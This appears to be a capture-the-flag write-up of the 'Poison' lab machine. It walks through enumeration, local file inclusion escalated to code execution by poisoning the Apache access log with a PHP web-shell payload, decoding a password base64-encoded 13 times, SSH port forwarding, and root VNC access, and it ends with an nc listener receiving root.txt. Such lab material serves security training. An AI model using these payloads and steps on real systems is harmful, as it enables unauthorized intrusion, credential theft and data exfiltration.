Enum

nmap

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Visiting port 80 we land on a page that includes local PHP files by name. That is a classic LFI, and if we can get PHP written into a file the server will include for us (such as its own access log), the LFI becomes RCE.

Since this is FreeBSD, the Apache access log is not in the usual Linux locations (and it is not /var/log/auth.log either, which is sshd's log on Linux and a different poisoning target). The FreeBSD port of Apache writes the access log to /var/log/httpd-access.log and the error log to /var/log/httpd-error.log.

On other systems the access log could be located in

/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access.log

Now let's poison the log by sending the PHP payload in a raw request with nc. The server answers 400 because the request line contains spaces and no protocol version, but Apache still writes the request line to the access log, which is all we need. The payload has to reach the log unencoded: if a client percent-encodes the angle brackets and spaces, the log ends up containing %3C%3Fphp... and PHP will not execute it.

nc 10.10.10.84 80
GET /<?php system($_GET['cmd']);?>
HTTP/1.1 400 Bad Request
Date: Wed, 24 Mar 2021 15:10:20 GMT
Server: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>

Including the poisoned access log through the LFI and passing commands in the cmd parameter (easiest from Burp Repeater) reveals a file called pwdbackup.txt.

The backup is a password that has been base64-encoded 13 times, one layer inside the other.

After decoding all the layers, the password is ?Charix!2#4%6&8(0
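Peeling the layers by hand is tedious and it is easy to lose count, so here is an added Python example (not from the original writeup) that strips nested base64 until the data stops being base64. The input is constructed for the example by wrapping the recovered password 13 times with line wrapping, standing in for the real pwdbackup.txt.

```python
import base64
import binascii
import string

PRINTABLE = frozenset(string.printable.encode())


def peel_base64(blob: bytes, max_layers: int = 64):
    """Strip nested base64 layers until the data stops being base64.

    Each pass drops line wraps (dumps are usually wrapped at 76 columns),
    decodes with strict alphabet and padding checking, and stops as soon as
    decoding fails or would produce non-printable bytes.
    Returns (plaintext, number_of_layers_removed).
    """
    current = blob
    layers = 0
    while layers < max_layers:
        candidate = b"".join(current.split())
        try:
            decoded = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            break  # not base64 any more: this is the innermost layer
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break  # one layer too far would turn text into binary junk
        current = decoded
        layers += 1
    return current, layers


def wrap_base64(secret: bytes, layers: int) -> bytes:
    """Build a fixture: base64-encode `layers` times, line-wrapped like a real dump."""
    data = secret
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data


# Constructed stand-in for pwdbackup.txt: the recovered password wrapped 13 times.
PWDBACKUP = wrap_base64(b"?Charix!2#4%6&8(0", 13)

if __name__ == "__main__":
    plaintext, depth = peel_base64(PWDBACKUP)
    print(f"{depth} layers -> {plaintext.decode()}")
```

The stopping rule is heuristic: a plaintext that happens to be valid base64 and decodes to printable bytes would get peeled one layer too far, so compare the reported layer count against what you expect, or print each intermediate layer when the result looks wrong.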

Including /etc/passwd through the same LFI shows a user called charix.

These credentials (charix / ?Charix!2#4%6&8(0) give us SSH access to the box.

In charix's home directory there is secret.zip. We copy it to our box with scp: scp charix@10.10.10.84:/home/charix/secret.zip secret.zip

The archive is password protected, and charix's password unzips it.

The extracted file, secret, is a small binary blob rather than text (it prints as something like [|Ֆz!.), which fits the format of a VNC password file.

Looking at unusual processes running as root, one stands out: an Xvnc server on display :1, started with root's .Xauthority.

ps -auxw

[...]
root     529   0.0  0.7  23620 7496 v0- I    Wed15      0:00.06 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120
[...]

Looking at listening ports

charix@Poison:~ % netstat -an | grep LIST
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

5801 and 5901 stand out: 5901 is the RFB port for VNC display :1 and 5801 is its HTTP/Java viewer port (the -httpd option in the Xvnc command line above). Both are bound to 127.0.0.1 only, so they are not reachable from outside.

We forward both to our box over SSH (local 6901 to the target's 127.0.0.1:5901, local 6801 to its 127.0.0.1:5801): ssh -L 6901:127.0.0.1:5901 -L 6801:127.0.0.1:5801 charix@10.10.10.84

Now that the ports are forwarded we can authenticate with the secret file, which vncviewer accepts directly as a VNC password file via -passwd. VNC password files are only obfuscated with a fixed, publicly known DES key, so holding the file is as good as holding the password. Because Xvnc runs as root, the desktop behind it is a root session.

vncviewer -passwd secret 127.0.0.1:6901

Having trouble getting the root.txt from the VNC session to my local box, so I transfer it via nc.

nc -nvlp 9001 > root.txt
listening on [any] 9001 ...
connect to [10.10.16.65] from (UNKNOWN) [10.10.10.84] 61534